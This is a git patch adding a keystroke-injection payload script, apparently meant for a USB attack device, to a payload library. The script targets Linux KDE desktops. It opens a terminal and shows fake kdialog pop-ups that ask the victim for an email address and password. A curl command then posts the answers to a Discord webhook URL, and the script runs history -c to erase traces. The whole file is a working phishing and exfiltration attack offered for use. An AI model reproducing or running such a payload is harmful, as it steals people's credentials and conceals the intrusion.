From dae8f2619c6fa9834187470a9db25d698e1770b5 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 11:45:55 +0200 Subject: [PATCH] Exfiltrate Email And Password By Phising --- .../payload.txt | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 payloads/library/execution/ExfiltrateEmailAndPasswordByPhising_Linux/payload.txt diff --git a/payloads/library/execution/ExfiltrateEmailAndPasswordByPhising_Linux/payload.txt b/payloads/library/execution/ExfiltrateEmailAndPasswordByPhising_Linux/payload.txt new file mode 100644 index 0000000..e717230 --- /dev/null +++ b/payloads/library/execution/ExfiltrateEmailAndPasswordByPhising_Linux/payload.txt @@ -0,0 +1,34 @@ +REM ########################################################### +REM # | +REM # Title : Exfiltrate Email And Password By Phising | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Phishing | +REM # Target : Linux | +REM # | +REM ########################################################### + +REM Requirements: +REM - Internet Connection +REM - Discord webhook +REM - KDE/kdialog based + +DELAY 1000 +CTRL-ALT t +DELAY 2000 + + +REM #### POPUP SECTION #### + + +REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks// +DEFINE WEBHOOK example.com +STRING WEBHOOK_URL=" +STRING WEBHOOK +STRING " +ENTER +DELAY 500 + +REM All-in-one is important +STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(echo $(kdialog --sorry 'Email incorrect.\n Will not connect to server, please retry.'; kdialog --title 'Email \n Put your email address to connect yout account.' --inputbox 'Email:'; kdialog --title 'Email Login' --password 'Email Password:';))\"}" $WEBHOOK_URL); history -c; exit; +ENTER